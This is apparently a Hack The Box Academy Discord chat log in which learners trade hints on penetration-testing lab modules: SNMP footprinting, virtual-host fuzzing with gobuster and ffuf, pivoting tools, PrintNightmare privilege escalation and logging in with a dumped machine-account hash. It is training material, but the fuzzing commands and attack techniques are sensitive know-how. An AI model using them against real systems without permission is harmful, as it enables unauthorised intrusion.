So sometimes we just gotta try stuff and see if it works with no feedback
Yeah IMO your methodology was good. Just for that one, since it is a login page, I would continue to test by trying various bypass methods.
Ok got it thx
I'm moving slowly but surely along the path
61%
Attacking AD was massive
I am having a bitch of time with the RDP and SOCKS Tunneling with SocksOverRDP module exercise. I get the proxy set up, tunnels are up, RDP connects and starts loading the user's desktop and then quits with "Your Remote Desktop Services session has ended." Defender is off, firewall is off. Patience is off. Any suggestions?
would anyone know why it keeps saying incorrect ? The question is "Which kernel release is installed on the system? (Format: 1.22.3)". We just need to put "uname -r" for it right?
should be, minus anything not a version number
make sure you're ssh into the system
my VM shows this 6.5.0-13parrot1-amd64 but it keeps saying incorrect
there's a target that's spawned 10.129.x.x (note the target and pwnbox are different things)
yeah that's the pwnbox, NOT the target
the pwnbox is subject to change versions as new releases come out, this is why they set up a static target
@mortal basin I'm liking this update, at least to this particular question, it definitely makes it a bit more user friendly (if only a little bit), though I do think that the RegEx section should be before it, at least IMO, since filtering and such for it is a bit easier with regexp, not impossible without it though.
The reason before why it seemed bullshit (in my opinion) is that it didn't make it clear that you only wanted the https://www.inlanefreight.com links, thus leading to some digging around for extraneous links to other domains to filter them out, and why I recommend a wonderful solution I found on the forum which actually broke down the series of piped commands
take out the -generic
just the numbers are required
Thank you! It worked
as a general tip for answering questions
- if you copy/paste make sure no additional whitespace characters
- try refreshing the page if you're sure the above has no additional whitespace
- double check that you did steps correctly
- be confused
- try again and it works™️
If Marcie got a dollar for every time they were right, and I got 1%, I'd be a millionaire
also make sure that if there is a (format:a.bb.cc) that you follow that format
if the format doesn't include a - or anything, you don't either
solid advice
I honestly don't recall if I even did it via the taught method. I know I would have tried it, but if it wasn't working, I would have just done it my own way.
Hello there 😄
Does anyone understand this snmp stuff?
Simple Network Management Protocol; it's used to monitor and manage devices
but what's your actual question i'm assuming it's gonna be related to the Footprinting - SNMP module/section?
Simple Network Management Protocol (SNMP) is an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior. Devices that typically support SNMP include cable modems, routers, network switches, servers, workstations, printers, and more.
SNM...
Yes its related to the Footprinting section. Let me type it out ...
So what I do understand:
- Used for monitoring and managing devices
- OSI layer 7 and communication done via UDP on port 161
- The OID (Object Identifier) is a globally unique number by some registry
- MIB (Management Information Base) text file with all queryable SNMP objects
What I don't really get:
- What does this Footprinting really provide me -> I don't really really get what the SNMP is providing me
For example:
iso.3.6.1.2.1.1.6.0 = STRING: "InFreight SNMP v0.91"
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing IP and ICMP implementatio
How should I understand those entries? Is the left one just the OID which is written out on the right side?
Sorry if the question is a bit blurry, but I can't really grasp the concept yet
OID = PROPERTY: Value
Aha... so the list provided above are all the oid's
note how they all start with iso.3.6.1.2.1.1 ?
Yes, this is because of the hierarchical stuff right?
that iso.3.6.1.2.1.1 is where the device is, everything after is informational
the 6.0 ending is just the version
the 9.1.3.x is sequential output text
basically everything that lives on that device will start at point X and activity on the device will subsequently be logged in some form; anything that is sequential or related will be logged under the same end or continue off the same number
Ahaaa, alright that makes a lot of sense. But how do you know where the "cut" is. Can you just say in general its the first 6 digits?
typically first 6. the syntax they provide for braa is basically it
AAaahhhhh I think I finally got it.
Let me try the exercise one more time. Btw, thank you very much for your help all the time. You are the MVP

Hi guys, I'm very stuck on Module: Bypassing Flawed Validation. I don't know what to do to complete this module, I've tried for days all of what is said in the course
Does HTB offers some kind of help?
Is it HTB or HTB Academy?
Academy
that looks like a section name, not a module name
Don't you also have this button at the bottom of the section?
I mean this provides you the solution If you struggle
that's only if you have an annual sub
I have not solved it myself, but just scrolling through it I would say it looks quite decent
Ahaaa
so @ember copper , I would say time get the sub haha
i would say avoid using the solution unless you're stuck
session name, right
section name is what you provided, not the module
yes
what's the module name
This is the module Abusing HTTP Misconfigurations
i haven't done that module as it's tier 3 but in order for others to assist you at bare minimum
- state what you've tried (avoiding spoilers, being broad is ok)
- state any errors you got when you tried something (if you copy/paste redact anything that would have been fuzzed/found)
- wait patiently for someone to answer
i need to spoof the Host header to look like localhost... i tried all the tricks
Thanks
there's no official help source for skill issues
but this is as close as you're getting since it seems like they're retiring the forum at some point
I saw today that there was a podcast with answers for questions about some stuff, I didn't understand if it was about the challenges or about the courses in general
it's just general questions; if you're referring to the cube talks thing
exactly that... oh, I was hopeful
A long time ago only one guy also posted that he was struggling with this session, but I think it is forbidden to DM the person
anyway since it's a tier 3 module once someone picks up to help you, it'll have to be taken to dm if it's a discussion on how to solve it and not a general hint
server rules
(as if anyone reads them anyway)
some people have their dms turned off for the above reason that they get unsolicited dms
Hi everyone 👋 I'm having trouble with a module. The objective is to identify the services running on the server, and then try to search to find an exploit to exploit a service. Once you do, try to get the content of the '/flag.txt' file. I have found all of the services and versions, however I'm not finding any exploits for them when searching on ExploitDB / MSF. Below is all the Services I've found on the host.
**SSH Services:**
Port 22: OpenSSH 9.2p1 (Debian 2+deb12u3)
Port 31373: OpenSSH 8.9p1 (Ubuntu 3ubuntu0.10)
Port 37888: OpenSSH 8.2p1 (Ubuntu 4ubuntu0.1)
Port 38773: OpenSSH 8.2p1 (Ubuntu 4ubuntu0.1)
Port 42222: OpenSSH 8.2p1 (Ubuntu 4ubuntu0.1)
Port 43471: OpenSSH 8.2p1 (Ubuntu 4ubuntu0.1)
Web Servers:
Apache httpd (multiple versions from 2.4.18 to 2.4.62) on various ports (e.g., 30216, 30835, 31494, 33215, 33316, etc.)
Nginx (multiple versions) on ports like 31890, 32489, 33215, 33645, 34884, etc.
Werkzeug (Python) on ports 35255, 42810
Node.js Express framework on ports 34309, 38926, 41101
Golang net/http server (Go-IPFS or InfluxDB) on ports 9962, 10256, 37423
**Database:**
MySQL service on port 43955
**Other Services:**
RPCbind (Port 111)
Nagios NSCA on ports 30253, 36403
DAAP (mt-daapd) on port 4240
you're overlooking something very important; the module gives you an IP:PORT. that is your ONLY scope
this looks like a public IP that you tried to nmap (which will quickly get you nowhere)
Thanks thats actually super helpful!! lol, indeed I only scanned the IP and didn't include port
it also helps to provide the module and section you're working on
Okay I'll make sure to do so in the future, this was Getting Started / Public Exploits Module/Section if anyone is curious.
Thanks again!
yeah you're way overcomplicating it
also as a general tip; i always try going to http://ip:port when presented with a public IP
since most of the time it's a web service
Still struggling on this, any help would be appreciated. thank you in advance
tom is the first user you find yeah? if so there may be more steps to consider
Think about what information you would like to have as a pentester.
@fathom pendant thanks a lot I got my flag and completed the module 🐐
yes the first user, i was able to mysql in as that user after looking at the bash history
so am i on the right path as far as looking through the db as tom? i saw another user while traversing while i was logged in via snmp
but couldn't do anything with it
Yes, you are on the right track with the database.
okay i'll keep digging
ah i just ran through this it's actually a lot simpler if you know how to do mysql query statements
Hello guys. Glad to be here.
Can you help me out with something.
On the starting point Fawn task 7 (What is the command we need to run in order to display the ‘ftp’ client help menu?) I enter: ftp -h this should be the right answer I tried different things but keep coming with red flag and idk what to do
the where <column> = 'string' portion can be helpful
Need some help on Injection Attacks > XPath - Blind Exploitation. I tried to exfiltrate the entire XML schema but couldn't get anything other than
<accounts>
<acc>
<username>username</username>
<password>password</password>
</acc>
<acc>
<username>username</username>
<password>password</password>
</acc>
</accounts>
Not sure what I missed
#starting-point read and follow #welcome to access
i did this one
dm me
Sent
if you need help dm me at the point you're stuck at and maybe i can unstuck ya a bit
ik you're in the db but i wanna know what's sticking ya
Hi everyone. I'm at the Attacking Web Applications with Ffuf module, directory fuzzing. There is an example command here: ffuf -w /opt/useful/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ where what comes after the -w is a wordlist. My question is, where does HTB get this wordlist from? Because every time I try to use this wordlist to complete the challenge, ffuf says that the file or directory does not exist!
it's just a general wordlist that's used and i can nearly guarantee that most of the time the directory should exist
but if I just simply create a txt file, I don't get any results from ffuf.
the wordlist is from the seclists repo
Automatic verification failed. Please contact support.
Need to speak to a person? Learn how to reach our support via HTB Labs.
discord isn't support
I did not post this. I have no idea why it is posted. I was searching for something.
¯\_(ツ)_/¯
Ha! Thank you. I saw a bunch of posts about people having issues with it - some were operator error but others similar to me, which might have been operator error but I'm not sure how since the session actually starts.
Yeah it's been awhile, so I'd really have to spin it up and work through it to see what happens on my end. I'll let you know if I do.
No worries. I reviewed the walk-through and believe I was doing everything correctly. Grabbed the flag from there and moved on.
What do you mean identify it without outside help? Without the guide?
Yeah without the walkthrough
Hey. In the Information Gathering - Web Edition module:
I don't understand what I am supposed to do with the target? Am I supposed to connect to it or something and then perform the zone transfer check for the inlanefreight.htb domain?
I'm pretty sure the section on that priv has numerous priv esc exploits, so there's one way. I have a bunch of ways in my notes. A Google search would work too, hacktricks etc.
Not sure if that's what you mean.
Not exactly, I meant moreso identifying the printnightmare vulnerability. As for exploiting it, I'm sure I could've used some other method fs
I think I understand what you mean though. Windows Priv Esc wasn't covered in the module, so you are wondering how someone would know to go that route. Is that what you mean?
Partially like I understand that exploitation of printnightmare leads to a priv esc which I think they glazed over in the prior modules but I don't really understand how I would have come to the conclusion that the server was vulnerable to the vulnerability in the first place
Looks like you're just supposed to perform a zone transfer against the IP, although it's been some time since I did that module
Well, for me the first things I always check on a host are my privs, so I would just add that to your methodology.
Using the IP as the name server of the domain?
Yeah I believe so since they've provided you with a dns server
You're right! Thanks man 🙏
It's mentioned that seimpersonateprivilege is often on service accounts and can lead to privesc using exploits like print nightmare. But I 100% agree that it is a bit strange that we're expected to exploit it with basically no info
Maybe I'm missing something here. Can printnightmare be executed with SeImpersonate privileges in all situations? I thought it was version dependent or at least dependent on what patches are installed on the system
Without extra research there is no way to figure out its vulnerable specifically to print nightmare
And while extra research is good, I thought the entire premise was that everything in the skill assessments is in the modules 😕
I got all of these @acoustic thorn , any clue what I am supposed to give as an answer?
I saw three types of DNS records:
A, SOA, NS
So I put "3" as an answer but doesn't seem to be working.
I'm glad I'm not alone in thinking that it was kind of strange but surely there's a way to come to a more definite conclusion
Unpatched windows print spooler service must be running
Otherwise it can't be exploited
Print nightmare I mean, you can still exploit rogue potato
I guess I'm curious if there's a script that can be used to check for that patch or a lack thereof
I used a different means. You still have to verify certain parameters are met for the exploits.
Nevermind, I got it.
Windows exploit suggester does I think. But why not make your own? 😁
I've got a ways to go ig😭
Good luck with the rest of the skill assessment
I might just need it lol
I can only hope this isn't the standard for the actual exam 😂 either way good practice i suppose
Reviews on the module say that the assessment is particularly difficult so let's hope not
I'm curious, did you exploit a different seImpersonate vulnerability?
Yes
Which if you don't mind my asking. I'm curious what other routes I might've missed
You can DM. I won't give you the answer, but will hopefully get you thinking.
Thanks I would appeciate that
@acoustic thorn careful (even with spoiler text) about revealing info on solving skill assessments
SeImpersonatePriv exploits will depend on the config of the machine
i remember with some blood sweat and tears refactoring the exploit suggester code for 3.9 🙃
they're asking for the total number of retrieved records NOT the types of records on the server(s) you can transfer to
all the A records on available hosts that you can transfer to
If you have gone to AD Modules before going through Windows ones, you will always find something that will get you stuck
I see a lot of people going through more advanced Modules without going through the basic and asking for help after
gonna play devil's advocate, the exploit used was only mentioned - but not showcased or exploited so it's not generally on people's minds
I mean.... Should've gone through Win Privesc then going for AD Enum and Attacks
so it's not necessarily that it wasn't because they didn't go through a basic module of some sort, it's more that when it comes to SeImpersonate, they only mention the various potatoes
win privesc is after ad enum in the pentester path
You mean by the list of Modules in the Path?
I rarely followed those
they're generally in order for a reason.
though I can agree that the privesc modules didn't need to be that far back
i think they spread it so that you're not just stuck on OS stuff the whole time
but meh
/feedback or something
I don't actually think it should be sent for feedback as there isn't only the "job paths". The Local Priv Esc Path in the "Skill Paths" could also be done
also looking at https://academy.hackthebox.com/module/details/143 it doesn't recommend it as a prerequisite module
People tend to just go for the ones in the "Job" list because of the certs and forget to go through the rest in the end
so again, not trying to argue just provided that if it was meant to be a pre-requisite, it's not listed
Good point
and i did find that the privesc stuff really wasn't all too necessary to complete the module as most of the time you were bouncing between windows stuff and basic config searches
if you feel it should be added and the path adjusted by all means suggest /feedback (i understand this may sound snarky, but i am actually being serious)
How would I log in with a machine account using nxc? For context, I transferred the krb5.keytab file from a linux machine, dumped it, and now have the machine account's NT hash.
usually -H for hashes
but if you have the keytab file just use that
you'd initialize it with kinit and then most tools that utilize kerberos pre-authentication, use -k as the argument
./ptunnel-ng: error while loading shared libraries: libcrypto.so.3: cannot open shared object file: No such file or directory
does anybody know how to fix this?
I was gonna edit it :)
i suggest not revealing hashes and info for modules above tier 0
I know. I'm not arguing. It's just that I see a lot of people with doubts that could be mitigated by going through the content of other Modules
don't use ptunnel-ng
im using sudo ./ptunnel-ng
you're very much right; i'm eventually gonna refactor my notes and have a vault that's more general with another vault that's just academy
and include the prerequisites from the /details/mod# in an over view/backlink
so what do i use marcielee? in the module there's only this command
the error you're getting is because when it was compiled, for whatever reason, it wasn't compiled with a shared object (so) library
in the pivoting module you can use any pivoting tool you'd like; imo ptunnel-ng was the most frustrating for me
owh icic thanks for the info marcielee, i think i will use chisel
I mean.. I'm just doing the course in order though but I hear you ig lol
My bad, not trying to spoil for anyone else
spoiler text does nothing
as it can either be disabled in settings, or clicked on and read anyway
Totally understand
It is kind of in the name tho haha either way I'll be more considerate of that
I didn't think they were set in a specific order.
I went through the modules as I could unlock them with the cubes from the monthly subs, so I didn't run in any order
I tended to go through subject
people looking to just get answers without actually learning will click it anyway
And went for the AD Modules in sequence
After going for the Privilege Escalation Skill Path
best practice if you're gonna use spoiler text is to use shorthands as well; i.e. first couple letters/characters of something
Ah I see, I didn't think about the order at all tbh. I just started at the top working my way to the bottom lol
i.e. found that Pr* can be used with Se*
@dapper moth but you have some degree of knowledge already before doing academy, so the way you go through it is ultimately gonna be different from how a n00b (like myself and others) would do it
so while your method works for you it isn't the generally recommended method
I do now.... Got most intermediate knowledge from Academy 
And boxes
I'm on the Information Gathering - Web Edition module.
Here on the vhost fuzzing section.
I have the tried the following command:
gobuster vhost -u http://94.237.50.242:54943 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
When using verbose mode I see that it's sending the requests to x.94.237.50.242:54943
I did not get any findings, but I believe it's because I am supposed to send the fuzzed words in the host header, how do I do that with gobuster?
I tried
gobuster vhost -u http://94.237.50.242:54943 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --domain inlanefreight.htb
but when using verbose mode I see that it's just attempting to send requests to the words itself, them not being a url.
You are no noob, @fathom pendant!
to --append-domain it needs a domain to append
So --append-domain inlanefreight.htb?
Still no results, and it's sending it like this...
I think supply inlanefreight.htb instead of the IP address so that when it appends the subdomain it's actually correct
I need to use 94.237.50.242:54943, inlanefreight.htb is not responsive
What marcielee said
Have you added it to your hosts file?
--append-domain --domain inlanefreight.htb
Oh
it requires both flags
There we gooo
Thank you @fathom pendant
i just use ffuf -H "HOST: FUZZ.inlanefreight.htb" ¯\_(ツ)_/¯
Ffuf is the only fuzzing tool for me 
Yeah well in this module we haven't learned to use ffuf yet, I know I could have used that but I'm just following instructions here
I've learned to supplement module material with additional material, also LLMs are really good
What of Feroxbuster ?
Hi everyone
Yeah I honestly never thought about that, since I already knew about abusing that privilege. It wasn't until someone mentioned it not long ago and I looked back at the module to see it touched on slightly in the privileged access section of the AD module.
lots of links
They seem similar but ffuf syntax is so intuitive
Oh, that's true... I usually avoid FFuF due to its long commands, but I think it's more effective
Fair but: ferox can auto fuzz subdirectories in a dir fuzz
Little harder to do with ffuf
Yeah, because the same result I get in Ferox is the same I will get on ffuf. I only use FFUF for subdomains and Ferox for subdomain directories
And most times .. it depends on the wordlist we use
--recursive --recursion-depth 2 .
Pretty simple 😕
Thats a thing? 😂
Istg I should read ffuf manual
Looked for it a few times and only found scripts 💀
Lmao i understand why you thought it was difficult then 😆
excuse me, for the footprinting hard module, do I assume it follows from the previous one? that is, do I assume the passwords from them still exist?
i mean i have tried to login with them so doesn't matter
yes lol
no
each skill assessment is its own independent machine, unless otherwise directed
(this goes for pretty much all modules)
i believe the only one that wasn't truly independent was the login brute forcing module
interesting, thank you!
then for most of those modules, we were recommended to download and test those options and so on
what is the best way to go for that?
do i run 2 VMs on my main Computer?
Hey friends, I've hit a bit of a bump in my "working with IDS/IPS" module. Anyone feel up to giving me some insight on running Suricata on a .pcap?
DAGA KOTOWARU
you don't download anything aside from the vpn to connect to the machines, there's no downloading the target configuration
you can download and test things on your attack box if you want or other vm if your pc can handle it
but you don't have to unless you wanna dive into the weeds of it
so can i really test it on the same Machine?
the gist of what you need to know is all given in the sections and assessments
i never needed to use suricata for that module
fair enough, best way to learn is by tinkering.
Hi, I'm new to cybersecurity and I don't speak English
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
this server is an English only server
I use Google translate
woot, got it figured out. Thanks for reminding me to read it over again
my target has been spawning for a few minutes, any resolution for this?
I've refreshed the page a couple times
try pressing ctrl + shift + r
try changing vpn regions as well sometimes that kicks it in the gear you'll have to respawn the target after, as it would be on the previous vpn spawn
and if using the pwnbox you'd also have to restart that
Try asking your question without spoiling the skill assessment
Well I got nothing correct though
if you had to fuzz for it; it's a spoiler
I'd also appreciate it if you wouldn't delete my entire question...
ask again, but without revealing the subdomains you had to dig for :)
Okay, well basically I found a subdomain inside a subdomain, I don't know where to search for the "hidden admin page"
I tried busting directories with no success
the hidden admin page is under the first subdomain, did you forget about something important 🤖
the first subdomain or just the general inlanefreight.htb?
first subdomain
I remember that one
:) i did not mix my words up (this time)
this is a big hint!
I'm going over the module again thinking what I'm missing.
also suggest adding the domain and subdomains you find to your /etc/hosts file
the emoji was a hint
Did gobuster dir seriously not check for robots.txt?
nope
well more specifically you didn't tell it to look for it
I imagined robots.txt being the first line in the wordlist lol
that one stumped me as well
in other news, I'm still waiting for this. I hard refreshed and shut down my pwnbox as well :/
change vpn region
.
What? I completely remember using gobuster dir with the same wordlist and it finding robots.txt multiple times how can that be?
directory-list-2.3-medium.txt is bad?
vpn regions don't have area names
they have us/eu academy 1-5
pwnbox region != vpn region
nah
make sure it's on the subdomain and not the sub subdomain
Having the same issue here
Ok i'm not the only one
I think I'm still missing something, I just get a 301 Moved Permanently on the admin page
Yep!
Different Modules' targets and switching the VPNs didn't resolve
yea I switched the vpn now, still spinning
try visiting it in a browser (also -L for curl to follow 301)
anybody have a clue about this? I already did chisel but still didn't make any progress
it's an a -> b -> c pivot from what i recall
And do I change the host manually within the browser or is there an easier trick?
in the reading they mention a b pivot
/etc/hosts
nm i thought he posted about windows attack and defense not pivoting
you should really get in the habit of editing your hosts file
ip domain sub.domain sub.sub.domain
you do not include the port in the hosts file
i still can't get it
I added the line on hosts file X.X.X.X inlanefreight.htb
but that did not work when trying to use sub.inlanefreight.htb
I already watched so many videos on YouTube, and it's still making me more confused
I still had to send it manually in the Host header
did you add the sub.inlanefreight.htb to the hosts file?
you have to add each discovered sub(sub)domain
subdomains can be on the same IP?
you can do it on the same line
Oh
yes...
name vhosts system 😉
how did... nevermind
I thought vhosts were directories 🤔
on a single host...which would have a single ip